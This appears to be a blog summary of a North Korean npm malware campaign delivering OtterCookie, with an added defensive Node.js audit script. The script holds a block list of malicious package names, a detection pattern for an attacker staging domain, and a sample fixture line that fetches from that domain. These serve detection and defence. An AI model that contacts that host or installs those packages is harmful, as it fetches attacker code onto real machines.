North Korean Hackers Release Updated OtterCookie Malware via Malicious npm Packages

  • Nov 29, 2025
  • 2 min read

Key Findings


  • North Korean threat actors behind the Contagious Interview campaign have published a further 197 malicious packages to the npm registry since last month's reporting

  • These packages have been downloaded more than 31,000 times in total and are designed to deliver a variant of the OtterCookie malware

  • Once launched, the malware attempts to evade sandboxes and virtual machines, profiles the host, and opens a command-and-control (C2) channel that gives the attackers a remote shell and the means to steal sensitive data


Background


  • Cisco Talos documented last month that the distinction between OtterCookie and BeaverTail is blurring, in connection with an infection at an organization in Sri Lanka

  • The loader packages connect to a hard-coded Vercel URL ("tetrismic.vercel[.]app"), which in turn fetches the cross-platform OtterCookie payload from a threat actor-controlled GitHub repository; an outbound connection to that host from an npm install or build step is a strong indicator of compromise


Malicious Packages


  • Some of the identified "loader" packages include bcryptjs-node, cross-sessions, json-oauth, node-tailwind, react-adparser, session-keeper, tailwind-magic, tailwindcss-forms, and webpack-loadcss, names chosen to resemble legitimate projects such as bcryptjs, Tailwind CSS and webpack

  • Once launched, OtterCookie attempts to evade sandboxes and virtual machines, profiles the machine, and then establishes a command-and-control (C2) channel that gives the attackers a remote shell, along with the ability to steal clipboard contents, log keystrokes, capture screenshots, and gather browser credentials, documents, cryptocurrency wallet data, and seed phrases
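
The two indicators the post gives, the loader package names and the hard-coded staging host, are enough for a first-pass audit of a project. The following Node.js script is an added example, not code from the original post or from the reporting it summarises: it checks the root package.json and a v2/v3 package-lock.json for the nine names quoted above, and, for each installed package the caller has read from node_modules, flags install-time lifecycle scripts and any reference (live or defanged) to the quoted Vercel host. The manifests, lockfile and source text below are constructed samples; the `installed` map, the finding types and the helper names are this example's own conventions, and the nine-name list is only a starting point, since the campaign involved 197 packages.

```javascript
'use strict';

// Added example: audit an npm project for the indicators named in the write-up.
// Loader package names quoted there. The campaign published 197 packages, so
// this is a seed list for the check, not an exhaustive blocklist.
const KNOWN_LOADER_PACKAGES = new Set([
  'bcryptjs-node', 'cross-sessions', 'json-oauth', 'node-tailwind',
  'react-adparser', 'session-keeper', 'tailwind-magic', 'tailwindcss-forms',
  'webpack-loadcss',
]);

// Staging host quoted (defanged) in the write-up, refanged here for matching.
const STAGING_DOMAIN = 'tetrismic.vercel.app';

// npm lifecycle scripts that run during `npm install`, before any code is imported.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Normalise defanged indicators ("host[.]tld") so either spelling matches.
function refang(text) {
  return text.replace(/\[\.\]/g, '.');
}

// Audit one installed package: its parsed package.json plus whatever source
// text the caller read from the package directory (assumed to be supplied).
function checkPackage(name, manifest, sourceText) {
  const findings = [];
  const pkg = manifest || {};
  if (KNOWN_LOADER_PACKAGES.has(name)) {
    findings.push({ pkg: name, type: 'known-loader-name' });
  }
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === 'string') {
      findings.push({ pkg: name, type: 'lifecycle-hook', hook, command: scripts[hook] });
    }
  }
  const haystack = refang(`${sourceText || ''}\n${JSON.stringify(pkg)}`);
  if (haystack.includes(STAGING_DOMAIN)) {
    findings.push({ pkg: name, type: 'staging-domain', domain: STAGING_DOMAIN });
  }
  return findings;
}

// Audit a project: root package.json, a lockfile v2/v3 "packages" map (keys
// like "node_modules/<name>"), and a map of installed package name -> { manifest, source }.
function auditProject(rootManifest, lockfile, installed) {
  const findings = [];
  const declared = Object.assign({}, rootManifest.dependencies, rootManifest.devDependencies);
  for (const [name, spec] of Object.entries(declared)) {
    if (KNOWN_LOADER_PACKAGES.has(name)) {
      findings.push({ pkg: name, type: 'declared-known-loader', spec });
    }
  }
  const lockPackages = (lockfile && lockfile.packages) || {};
  for (const [key, entry] of Object.entries(lockPackages)) {
    const idx = key.lastIndexOf('node_modules/');
    if (idx === -1) continue; // the '' key is the root project itself
    const name = key.slice(idx + 'node_modules/'.length); // handles scoped and nested paths
    if (KNOWN_LOADER_PACKAGES.has(name)) {
      findings.push({ pkg: name, type: 'locked-known-loader', version: entry.version });
    }
  }
  for (const [name, pkg] of Object.entries(installed || {})) {
    findings.push(...checkPackage(name, pkg.manifest, pkg.source));
  }
  return findings;
}

// Constructed sample inputs (not real package contents) for a stand-alone run.
const SAMPLE_ROOT = {
  name: 'demo-app',
  dependencies: { express: '^4.19.0', 'tailwindcss-forms': '^1.0.3' },
};
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/express': { version: '4.19.2' },
    'node_modules/tailwindcss-forms': { version: '1.0.3' },
  },
};
const SAMPLE_INSTALLED = {
  express: {
    manifest: { name: 'express', version: '4.19.2' },
    source: "module.exports = require('./lib/express');",
  },
  'tailwindcss-forms': {
    manifest: { name: 'tailwindcss-forms', version: '1.0.3', scripts: { postinstall: 'node lib/setup.js' } },
    // Constructed stand-in for a loader that calls home to the staging host.
    source: "fetch('https://tetrismic.vercel.app/').then(r => r.text());",
  },
};

for (const finding of auditProject(SAMPLE_ROOT, SAMPLE_LOCK, SAMPLE_INSTALLED)) {
  console.log(JSON.stringify(finding));
}
```

On the samples the script reports five findings, all against tailwindcss-forms: it is declared, it is locked, its name is on the list, it has a postinstall hook, and its source references the staging host. A hit on the name list or the host is decisive; a lifecycle hook on its own is common in legitimate packages and only warrants reading what the script does. While reviewing, `npm install --ignore-scripts` keeps install hooks from executing.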


Ongoing Campaigns


  • The Contagious Interview campaign is one of the most prolific campaigns abusing the npm registry, and it shows how North Korean threat actors have adapted their tooling to modern JavaScript and cryptocurrency-centric development workflows

  • Fake assessment-themed websites created by the threat actors have also leveraged ClickFix-style instructions to deliver malware referred to as GolangGhost (aka FlexibleFerret or WeaselStore) under the pretext of fixing camera or microphone issues


Threat Actor Attribution


  • The ClickFix-style activity is also tracked under the moniker ClickFake Interview; both it and Contagious Interview are distinct from the DPRK IT Worker schemes, which focus on embedding operatives inside legitimate businesses under false identities

  • Contagious Interview compromises individuals through staged recruiting pipelines, malicious coding exercises, and fraudulent hiring platforms, weaponizing the job application process itself


Sources


  • https://thehackernews.com/2025/11/north-korean-hackers-deploy-197-npm.html

  • https://x.com/Dinosn/status/1994449828810530894

  • https://x.com/TheHackersNews/status/1994440919207362913

  • https://bvtech.org/north-korean-hackers-deploy-197-npm-packages-to-spread-updated-ottercookie-malware/

© 2025 by Explain IT Again